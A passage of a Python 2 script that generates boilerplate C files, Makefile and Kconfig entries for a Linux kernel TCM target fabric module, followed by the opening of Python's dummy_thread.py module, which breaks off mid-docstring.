buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += " .fabric_post_link = NULL,\n"
buf += " .fabric_pre_unlink = NULL,\n"
buf += " .fabric_make_np = NULL,\n"
buf += " .fabric_drop_np = NULL,\n"
buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
buf += "};\n\n"
buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
buf += "{\n"
buf += " struct target_fabric_configfs *fabric;\n"
buf += " int ret;\n\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += " /*\n"
buf += " * Register the top level struct config_item_type with TCM core\n"
buf += " */\n"
buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
buf += " if (IS_ERR(fabric)) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
buf += " return PTR_ERR(fabric);\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
buf += " */\n"
buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
buf += " /*\n"
buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
buf += " */\n"
buf += " fabric->tf_cit_tmpl.tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
buf += " fabric->tf_cit_tmpl.tfc_tpg_base_cit.ct_attrs = NULL;\n"
buf += " fabric->tf_cit_tmpl.tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
buf += " fabric->tf_cit_tmpl.tfc_tpg_param_cit.ct_attrs = NULL;\n"
buf += " fabric->tf_cit_tmpl.tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
buf += " fabric->tf_cit_tmpl.tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
buf += " fabric->tf_cit_tmpl.tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
buf += " fabric->tf_cit_tmpl.tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
buf += " fabric->tf_cit_tmpl.tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
buf += " /*\n"
buf += " * Register the fabric for use within TCM\n"
buf += " */\n"
buf += " ret = target_fabric_configfs_register(fabric);\n"
buf += " if (ret < 0) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
buf += " return ret;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup our local pointer to *fabric\n"
buf += " */\n"
buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_deregister_configfs(void)\n"
buf += "{\n"
buf += " if (!" + fabric_mod_name + "_fabric_configfs)\n"
buf += " return;\n\n"
buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " int ret;\n\n"
buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
buf += " if (ret < 0)\n"
buf += " return ret;\n\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " " + fabric_mod_name + "_deregister_configfs();\n"
buf += "};\n\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
process_fo = 0;
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
process_fo = 1;
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!nacl) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('\*release_cmd\)\(', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
| gpl-2.0 |
romankagan/DDBWorkbench | python/lib/Lib/dummy_thread.py | 86 | 4494 | """Drop-in replacement for the thread module.
Meant to be used as a brain-dead substitute so that threaded code does
not need to be rewritten for when the thread module is not present.
Suggested usage is::
try:
import thread
except ImportError:
import dummy_thread as thread
"""
__author__ = "Brett Cannon"
__email__ = "brett@python.org"
# Exports only things specified by thread documentation
# (skipping obsolete synonyms allocate(), start_new(), exit_thread())
__all__ = ['error', 'start_new_thread', 'exit', 'get_ident', 'allocate_lock',
'interrupt_main', 'LockType']
import traceback as _traceback
import warnings
class error(Exception):
"""Dummy implementation of thread.error."""
def __init__(self, *args):
self.args = args
def start_new_thread(function, args, kwargs={}):
"""Dummy implementation of thread.start_new_thread().
Compatibility is maintained by making sure that ``args`` is a
tuple and ``kwargs`` is a dictionary. If an exception is raised
and it is SystemExit (which can be done by thread.exit()) it is
caught and nothing is done; all other exceptions are printed out
by using traceback.print_exc().
